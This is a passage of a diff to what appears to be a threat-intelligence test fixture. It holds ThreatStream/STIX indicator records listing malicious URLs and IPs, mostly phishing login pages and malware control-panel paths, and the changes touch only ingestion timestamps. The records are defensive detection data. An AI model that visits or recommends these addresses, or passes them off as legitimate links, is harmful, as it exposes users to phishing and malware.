"ingested": "2021-12-14T14:57:43.118280205Z", "original": "{\"created\":\"2020-02-01T02:11:41.88Z\",\"description\":\"TS ID: 55277443064; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--297cf29f-42ad-44ac-9f04-5156899d5ce9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:41.88Z\",\"name\":\"mal_url: http://q74722vp.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://q74722vp.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:41.88Z\"}", "category": "threat", "type": "indicator", @@ -13934,7 +13934,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024164200Z", + "ingested": "2021-12-14T14:57:43.118280643Z", "original": "{\"created\":\"2020-02-02T01:57:18.343Z\",\"description\":\"TS ID: 55280666668; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--194d8979-3fb6-4ebb-b7b1-d4758be6b32a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-02T01:57:18.343Z\",\"name\":\"mal_url: http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.343Z\"}", "category": "threat", "type": "indicator", @@ -13986,7 +13986,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024189Z", + "ingested": "2021-12-14T14:57:43.118281310Z", "original": "{\"created\":\"2020-02-02T01:57:18.366Z\",\"description\":\"TS ID: 55280666642; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime\",\"id\":\"indicator--7470705a-310f-4fe9-9c2f-02b5eac2ff94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-02T01:57:18.366Z\",\"name\":\"mal_url: http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.366Z\"}", "category": "threat", "type": "indicator", @@ -14037,7 +14037,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024195700Z", + "ingested": "2021-12-14T14:57:43.118281793Z", "original": "{\"created\":\"2020-02-02T01:57:18.451Z\",\"description\":\"TS ID: 55280666607; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--20860e18-16e7-4a9a-a485-7588aaee909b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-02T01:57:18.451Z\",\"name\":\"mal_url: http://calmingvapors.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://calmingvapors.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.451Z\"}", "category": "threat", "type": "indicator", @@ -14089,7 +14089,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024199100Z", + "ingested": "2021-12-14T14:57:43.118283611Z", "original": "{\"created\":\"2020-02-02T01:57:18.605Z\",\"description\":\"TS ID: 55280666626; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--6d90d2cb-9fc8-43a4-b4c0-d9ab027f2268\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-02T01:57:18.605Z\",\"name\":\"mal_url: http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.605Z\"}", "category": "threat", "type": "indicator", @@ -14141,7 +14141,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024204300Z", + "ingested": "2021-12-14T14:57:43.118284117Z", "original": "{\"created\":\"2020-02-02T01:57:19.047Z\",\"description\":\"TS ID: 55280666671; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--ffc26af5-40e7-4157-9d15-cf6048ef86a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-02T01:57:19.047Z\",\"name\":\"mal_url: http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:19.047Z\"}", "category": "threat", "type": "indicator", @@ -14192,7 +14192,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024209600Z", + "ingested": "2021-12-14T14:57:43.118284592Z", "original": "{\"created\":\"2020-02-02T01:57:19.068Z\",\"description\":\"TS ID: 55280666596; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5c4cfe56-5fda-4c2b-9b8c-3d384988c3ac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T01:57:19.068Z\",\"name\":\"mal_url: http://f0392879.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0392879.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:19.068Z\"}", "category": "threat", "type": "indicator", @@ -14244,7 +14244,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024215700Z", + "ingested": "2021-12-14T14:57:43.118285029Z", "original": "{\"created\":\"2020-02-02T01:57:25.701Z\",\"description\":\"TS ID: 55280666633; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--8fdc4cfc-1312-4f6c-99ce-3a0a582a07d3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-02T01:57:25.701Z\",\"name\":\"mal_url: http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:25.701Z\"}", "category": "threat", "type": "indicator", @@ -14296,7 +14296,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024219500Z", + "ingested": "2021-12-14T14:57:43.118285518Z", "original": "{\"created\":\"2020-02-02T01:57:25.838Z\",\"description\":\"TS ID: 55280666656; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime\",\"id\":\"indicator--9d8a164e-4f04-4ad2-a1a5-9c4dea319b97\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-02T01:57:25.838Z\",\"name\":\"mal_url: http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:25.838Z\"}", "category": "threat", "type": "indicator", @@ -14347,7 +14347,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024224800Z", + "ingested": "2021-12-14T14:57:43.118286298Z", "original": "{\"created\":\"2020-02-02T01:57:29.827Z\",\"description\":\"TS ID: 55280666597; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--001b0157-c446-40fd-8e01-136a2cab433f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-02T01:57:29.827Z\",\"name\":\"mal_url: http://f0391832.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391832.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:29.827Z\"}", "category": "threat", "type": "indicator", @@ -14398,7 +14398,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024229400Z", + "ingested": "2021-12-14T14:57:43.118286747Z", "original": "{\"created\":\"2020-02-02T01:57:48.75Z\",\"description\":\"TS ID: 55280666598; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4c7c0429-b6f8-4376-8d84-18d68d212b34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-02T01:57:48.75Z\",\"name\":\"mal_url: http://f0391281.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391281.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:48.75Z\"}", "category": "threat", "type": "indicator", @@ -14449,7 +14449,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024233500Z", + "ingested": "2021-12-14T14:57:43.118287155Z", "original": "{\"created\":\"2020-02-02T01:58:23.948Z\",\"description\":\"TS ID: 55280666593; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4eeed5f1-092b-4a3f-8c54-f5eb87b5a19c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T01:58:23.948Z\",\"name\":\"mal_url: http://f0393735.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393735.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:23.948Z\"}", "category": "threat", "type": "indicator", @@ -14501,7 +14501,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024237900Z", + "ingested": "2021-12-14T14:57:43.118287551Z", "original": "{\"created\":\"2020-02-02T01:58:44.041Z\",\"description\":\"TS ID: 55280666689; iType: mal_url; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--c253cabd-5a52-4b5f-a53f-94ca58ee3f60\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-02T01:58:44.041Z\",\"name\":\"mal_url: http://gerawest.xyz/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gerawest.xyz/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:44.041Z\"}", "category": "threat", "type": "indicator", @@ -14552,7 +14552,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024241400Z", + "ingested": "2021-12-14T14:57:43.118288041Z", "original": "{\"created\":\"2020-02-02T01:58:54.099Z\",\"description\":\"TS ID: 55280666701; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--0bb2320f-9a03-4375-ad2a-10b5d3c41b36\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-02T01:58:54.099Z\",\"name\":\"mal_url: http://f0387404.xsph.ru/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387404.xsph.ru/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:54.099Z\"}", "category": "threat", "type": "indicator", @@ -14603,7 +14603,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024246400Z", + "ingested": "2021-12-14T14:57:43.118288491Z", "original": "{\"created\":\"2020-02-02T01:59:11.446Z\",\"description\":\"TS ID: 55280666697; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--f6198f5d-4056-4b4f-8ab7-d9b82ec4878b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-02T01:59:11.446Z\",\"name\":\"mal_url: http://j1040794.myjino.ru/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1040794.myjino.ru/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:59:11.446Z\"}", "category": "threat", "type": "indicator", @@ -14654,7 +14654,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024252500Z", + "ingested": "2021-12-14T14:57:43.118288927Z", "original": "{\"created\":\"2020-02-02T01:59:24.665Z\",\"description\":\"TS ID: 55280666589; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--60d7cde7-6852-4295-8399-81b21cc74d7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-02T01:59:24.665Z\",\"name\":\"mal_url: http://f0395171.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0395171.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:59:24.665Z\"}", "category": "threat", "type": "indicator", @@ -14706,7 +14706,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024258800Z", + "ingested": "2021-12-14T14:57:43.118289370Z", "original": "{\"created\":\"2020-02-02T02:00:11.839Z\",\"description\":\"TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--f31af3ce-1dfe-4846-8f78-cc0f5e73dd2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:11.839Z\",\"name\":\"mal_url: http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:11.839Z\"}", "category": "threat", "type": "indicator", @@ -14758,7 +14758,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024265900Z", + "ingested": "2021-12-14T14:57:43.118289884Z", "original": "{\"created\":\"2020-02-02T02:00:15.667Z\",\"description\":\"TS ID: 55280666662; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--f6bd5b3a-7b17-4b33-a487-1d47f9ffa62b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-02T02:00:15.667Z\",\"name\":\"mal_url: http://nortonlilly.info/boss/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/boss/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:15.667Z\"}", "category": "threat", "type": "indicator", @@ -14809,7 +14809,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024273Z", + "ingested": "2021-12-14T14:57:43.118290296Z", "original": "{\"created\":\"2020-02-02T02:00:31.866Z\",\"description\":\"TS ID: 55280666667; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--bc1481fa-a858-4a87-9ef6-8844ace2dbed\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-02T02:00:31.866Z\",\"name\":\"mal_url: http://ildar-mael-ru.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ildar-mael-ru.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:31.866Z\"}", "category": "threat", "type": "indicator", @@ -14861,7 +14861,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024280100Z", + "ingested": "2021-12-14T14:57:43.118290685Z", "original": "{\"created\":\"2020-02-02T02:00:31.895Z\",\"description\":\"TS ID: 55280666659; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e441cd63-5660-465f-a299-b035d8276ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-02T02:00:31.895Z\",\"name\":\"mal_url: http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:31.895Z\"}", "category": "threat", "type": "indicator", @@ -14906,7 +14906,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024287100Z", + "ingested": "2021-12-14T14:57:43.118291158Z", "original": "{\"created\":\"2020-02-02T02:00:38.587Z\",\"description\":\"TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--f83c3853-4de3-4139-8076-a598265f453c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-02T02:00:38.587Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.587Z\"}", "category": "threat", "type": "indicator", @@ -14957,7 +14957,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024294100Z", + "ingested": "2021-12-14T14:57:43.118291603Z", "original": "{\"created\":\"2020-02-02T02:00:38.657Z\",\"description\":\"TS ID: 55280666595; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--374e400c-0db7-4e0d-b533-5b6653178da0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T02:00:38.657Z\",\"name\":\"mal_url: http://f0393257.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393257.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.657Z\"}", "category": "threat", "type": "indicator", @@ -15009,7 +15009,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024301Z", + "ingested": "2021-12-14T14:57:43.118292044Z", "original": "{\"created\":\"2020-02-02T02:00:44.275Z\",\"description\":\"TS ID: 55280666609; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--6a115b32-72cb-4397-9550-28bd809ff522\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:44.275Z\",\"name\":\"mal_url: http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:44.275Z\"}", "category": "threat", "type": "indicator", @@ -15054,7 +15054,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024308200Z", + "ingested": "2021-12-14T14:57:43.118292492Z", "original": "{\"created\":\"2020-02-02T02:01:03.981Z\",\"description\":\"TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--7c6e0ed1-51a4-460c-a69a-75ce73db8961\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-02T02:01:03.981Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:03.981Z\"}", "category": "threat", "type": "indicator", @@ -15099,7 +15099,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024315100Z", + "ingested": "2021-12-14T14:57:43.118292988Z", "original": "{\"created\":\"2020-02-02T02:01:09.238Z\",\"description\":\"TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--c5225c57-2cfd-4cd4-873a-068d5577959e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:01:09.238Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:09.238Z\"}", "category": "threat", "type": "indicator", @@ -15144,7 +15144,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024322Z", + "ingested": "2021-12-14T14:57:43.118293386Z", "original": "{\"created\":\"2020-02-03T01:56:22.888Z\",\"description\":\"TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--30cc7535-c071-4164-89a2-f9fe308cbe2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:56:22.888Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:22.888Z\"}", "category": "threat", "type": "indicator", @@ -15195,7 +15195,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024329Z", + "ingested": "2021-12-14T14:57:43.118293778Z", "original": "{\"created\":\"2020-02-03T01:56:30.815Z\",\"description\":\"TS ID: 55283402093; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--16fe8840-e1d7-4e71-acd8-d727ed7baa09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-03T01:56:30.815Z\",\"name\":\"mal_url: http://mine.kommanditgesel.icu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mine.kommanditgesel.icu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:30.815Z\"}", "category": "threat", "type": "indicator", @@ -15247,7 +15247,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024336Z", + "ingested": "2021-12-14T14:57:43.118294293Z", "original": "{\"created\":\"2020-02-03T01:56:31.691Z\",\"description\":\"TS ID: 55283402090; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--c091ca15-bd83-4318-b0f0-1c322baa7a7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-03T01:56:31.691Z\",\"name\":\"mal_url: http://soapstampingmachines.com/slider/data1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://soapstampingmachines.com/slider/data1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:31.691Z\"}", "category": "threat", "type": "indicator", @@ -15298,7 +15298,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024340Z", + "ingested": "2021-12-14T14:57:43.118294739Z", "original": "{\"created\":\"2020-02-03T01:56:34.945Z\",\"description\":\"TS ID: 55283402094; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d68559f0-f20c-40bb-ab62-c2f80c83c80f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-03T01:56:34.945Z\",\"name\":\"mal_url: http://jino-stell-jino.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jino-stell-jino.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:34.945Z\"}", "category": "threat", "type": "indicator", @@ -15350,7 +15350,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024343400Z", + "ingested": "2021-12-14T14:57:43.118295126Z", "original": "{\"created\":\"2020-02-03T01:57:32.61Z\",\"description\":\"TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--ba8f8e26-04b9-460b-b1f4-cf0b2d85db94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:57:32.61Z\",\"name\":\"mal_url: http://89.160.20.156/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:32.61Z\"}", "category": "threat", "type": "indicator", @@ -15395,7 +15395,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024348300Z", + "ingested": "2021-12-14T14:57:43.118295516Z", "original": "{\"created\":\"2020-02-03T01:57:46.702Z\",\"description\":\"TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--571838b6-5834-4cb9-a1eb-34f535483f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-03T01:57:46.702Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:46.702Z\"}", "category": "threat", "type": "indicator", @@ -15447,7 +15447,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024353600Z", + "ingested": "2021-12-14T14:57:43.118296032Z", "original": "{\"created\":\"2020-02-03T01:58:15.744Z\",\"description\":\"TS ID: 55283402101; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--336d902d-e5d8-48c1-87be-c4f506274d34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-03T01:58:15.744Z\",\"name\":\"mal_url: http://hypercleaner.su/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hypercleaner.su/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:58:15.744Z\"}", "category": "threat", "type": "indicator", @@ -15499,7 +15499,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024359600Z", + "ingested": "2021-12-14T14:57:43.118296513Z", "original": "{\"created\":\"2020-02-03T01:58:28.73Z\",\"description\":\"TS ID: 55283402095; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--cae5efb7-ff91-4a8d-bf28-21ffff0e4994\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-03T01:58:28.73Z\",\"name\":\"mal_url: http://pnny.kommanditgesel.icu/news/plast/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 